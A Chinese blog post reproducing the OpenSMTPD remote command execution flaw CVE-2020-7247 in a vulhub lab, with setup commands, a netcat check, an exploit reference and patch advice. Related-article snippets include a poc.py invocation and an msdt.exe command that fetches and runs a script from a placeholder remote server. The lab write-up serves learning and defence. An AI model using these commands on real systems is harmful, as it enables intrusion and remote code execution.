CVE-2020-7247 OpenSMTPD 远程命令执行漏洞复现

已于 2023-04-25 18:27:16 修改
阅读量2.5k 收藏 2
点赞数 1
分类专栏: 教程 漏洞复现 文章标签: web安全 安全 网络安全 学习
于 2022-08-22 19:24:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ierciyuan/article/details/126472196
版权

目录

一、漏洞信息

二、环境搭建

三、复现过程

四、修复建议

一、漏洞信息

漏洞名称OPENSMTPD 远程命令执行漏洞
漏洞编号CVE-2020-7247
危害等级中危
漏洞厂商OpenSMTPD
受影响版本OpenSMTPD <= 6.6.2p1
漏洞概述OpenSMTPD 是面向 unix 操作系统 (BSD, MacOS, GNU/Linux) 的一个 smtp 服务程序,遵循 RFC 5321 SMTP 协议,OpenSMTPD 最初是为 OpenBSD 操作系统开发的,是 OpenBSD 项目的一部分,由于其开源的特性,进而分发到了其他 unix 平台。 CVE-2020-7247 是 OpenSMTPD 在实现 RFC 5321 的过程中对 发件人/收件人 校验不严而导致的。

二、环境搭建

使用vulhub提供的镜像容器进行靶场搭建:

docker-compose up -d

三、复现过程

1.在另一台kali上使用nc命令检查IP端口连接

nc 192.168.10.133 8825 -v

2.exp检查利用

exp下载OpenSMTPD 6.6.1 - Remote Code Execution - Linux remote Exploit

使用exp对目标服务器创建‘yyds’文件

执行后,访问服务器容器,可以发现文件创建成功

四、修复建议

2020年01月29日,OpenSMTPD官方在github代码仓库提交了针对CVE-2020-7247漏洞的修复,请及时升级至OpenSMTPD的最新版本(6.6.2或更高版本),可从OpenSMTPD网站获得。

luochen678
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OpenSMTPD 远程命令执行漏洞 (CVE-2020-7247)
EC_Carrot的博客
07-18 1658
漏洞详细 OpenBSD是加拿大OpenBSD项目组的一套跨平台的、基于BSD的类UNIX操作系统。 OpenSMTPD 6.6版本(用于OpenBSD 6.6版本和其他产品)中的smtp_session.c文件的‘smtp_mailaddr’函数存在安全漏洞远程攻击者可通过特制的SMTP session利用该漏洞以root权限执行任意命令漏洞复现 我使用的是vulhub的环境,环境内自带poc.py文件 使用poc.py来执行命令: python3 poc.py your-ip 8825 <c
vulhub漏洞复现47_OpenSMTPD
weixin_44193247的博客
02-10 635
vulhub漏洞复现练习篇
Python 渗透测试:电子邮件 SMTP 协议 弱密码测试.(25端口)
最新发布
网络安全领域___专研者.
05-19 624
SMTP (Simple Mail Transfer Protocol) 是一种用于电子邮件传输的标准网络协议。它定义了电子邮件客户端和服务器之间如何进行通信和交换邮件信息。SMTP 协议爆破是一种利用 SMTP 协议漏洞进行密码破解的攻击方式。
vulhub之opensmtpd篇
weixin_56306210的博客
11-08 175
vulhub之opensmtpd篇
CVE-2020-8794:OpenSMTPD远程命令执行漏洞
simple___sunny的博客
11-20 937
CVE-2020-8794:OpenSMTPD远程命令执行漏洞 0x00 简介 OpenSMTPD (也称为OpenBSD SMTP服务器)是 OpenBSD 项目的一部分,一个免费的服务器端SMTP协议实现,通过RFC5321定义。 0x01 漏洞概述 CVE-2020-8794 是一个越界读取漏洞,可被远程利用,成功的利用可导致攻击者以 root 身份执行注入到 envelope 文件中的任意命令 0x02 影响版本 OpenSMTPD < 6.6.4p1 0x03 环境搭建 第一步,首先利用ap
OpenSMTPD: 开源的 SMTP 服务器实现
gitblog_00012的博客
03-16 440
OpenSMTPD: 开源的 SMTP 服务器实现 OpenSMTPD 是一个开源的 SMTP 服务器实现,它提供了一种简单而强大的方式来管理电子邮件服务。OpenSMTPD 的目标是成为一个可靠、高效且易于使用的邮件传输代理。 什么是 OpenSMTPD? OpenSMTPD 是一个基于 BSD 授权的 SMTP 服务器实现,由 OpenBSD 团队开发。它是 OpenBSD 操作系统的一部分,...
命令注入_开源邮件服务器 OpenSMTPD 被曝命令注入漏洞
weixin_30359265的博客
12-31 359
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队本周,开源邮件服务器 OpenSMTPD 发布更新,解决了一个界外读取漏洞,导致任意代码执行后果。OpenSMTPD 是 OpenBSD 中简单邮件传输协议 (SMTP) 的开源实现,其可移植版本能够在多种 Linux 发行版本以及苹果 Mac OS X 平台上运行。该漏洞的编号是 CVE-2020-8794,存在于自2015年...
CVE-2020-10199 远程命令执行漏洞
m0_46580995的博客
07-23 2673
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199) 其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞复现环境 vulhub 复现漏洞首先要知道用户名和密码,vulhub已经给出 admin/admin 使用msf5搜索exp CVE-2020-10199 use exp查看选项 show options x需要配置Rhost,Lhost ,password和port check一下 目标脆弱可以run ls ...
CVE-2020-16838 Windows tcp/ip 远程代码执行漏洞复现
Lelouch_E的博客
11-17 241
漏洞环境 攻击机:windows 10 (python版本:3.7 ,安装了scapy依赖) 受害机环境:windows10 1909 受害机网络开启ipv6支持 打开cmd输入ipconfig查看受害机ipv6地址为 fd15:4ba5:5a2b:1008:8c9a:8a2b:4489:74aa 攻击机的ipv6地址为 fe80::9835:b7ba:c813:5f6a%10 要求攻击机与受害机网络畅通 漏洞分析   根据rfc5006描述,RDNSS包的length应为奇
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cw.opensmtpd:安装和配置OpenSMTPd
05-26
OpenSMTPd 安装和配置 。 用法 将cw.opensmtpd模块包括到您的剧本中。 描述 OpenSMTPd非常简单,同时对其进行了更新,以强制将别名路由到完全合格(如果存在)的收件人,并且仅中继来自本地连接的邮件。 如果opensmtpd_smarthost被定义它被用作smathost用于递送。 配置 请参阅defaults/main.yml特定文档 版权 作者:SébastienGross <seb> 许可证:WTFPL,在此处获取您的副本: ://www.wtfpl.net
OpenSMTPD:这是官方的OpenSMTPD可移植存储库。 欢迎叉,拉请求和其他贡献!
05-13
打开SMTPD OpenSMTPD是定义的服务器端SMTP协议的免费实现,带有一些其他标准扩展。 它允许普通计算机与使用SMTP协议的其他系统交换电子邮件。 OpenSMTPD在各种和类似Unix的操作系统上运行,包括: Linux 有关更多信息: : 如果您正在寻找有关如何构建自己的邮件服务器的全面手册,请访问我们的 。 保持联系 如果您想了解最新动态或与OpenSMTPD聊天,您可以: 订阅我们的邮件列表: http : //www.opensmtpd.org/list.html 加入IRC频道: #opensmtpd @ irc.freenode.net 在GitHub上提交错误报告或功能请求 访问GitHub的讨论页面 文献资料 手册页可在线获得,建议您为它们做贡献。 通过软件包管理器安装 许多发行版已经提供了opensmtpd的打包版本。 您需要做的就是
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
OSCP-Bratarina(OpenSMTPD)
墨痕诉清风的博客
04-24 178
转到OpenSMTPd 2.0的端口25,searchsploit展示了一些远程代码执行的结果,包括Metasploit的一些结果。看到了一个很大的用户列表,但实际上只对那些拥有bash shell的用户感兴趣。为这些实体使用grep,并将这些用户添加到一个文本文件中,以备以后使用。有一个名为“passwd.bak”的文件,可以使用“get”命令在本地下载。端口80上的网页,看到一个名为FlaskBB的CMS。快速搜索一下,发现这里没有什么有趣的东西。用-q 标志靴子它,这样我们就不会得到响亮的垃圾横幅;
Python SMTP 发送邮件
冷月醉雪的博客
02-13 1029
    SMTP(Simple Mail Transfer Protocol)即简单邮件传输协议,它是一组用于由源地址到目的地址传送邮件的规则,由它来控制信件的中转方式。     Python的smtplib提供了一种很方便的途径发送电子邮件。它对smtp协议进行了简单的封装。     Python 创建 SMTP 对象语法如下: import smtplib smtpObj = smt...
linux系统漏洞整改策略
热门推荐
刘铭辉的博客
02-27 1万+
1、远端WWW服务支持TRACE请求漏洞 服务是weblogic部署的,对Linux系统自带的apache没有主观的依赖可以停止。 停止apache命令:service httpd stop 启动apache命令:service httpd start。启动如果报错httpd: Could not reliably determine the server's fully qualified...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值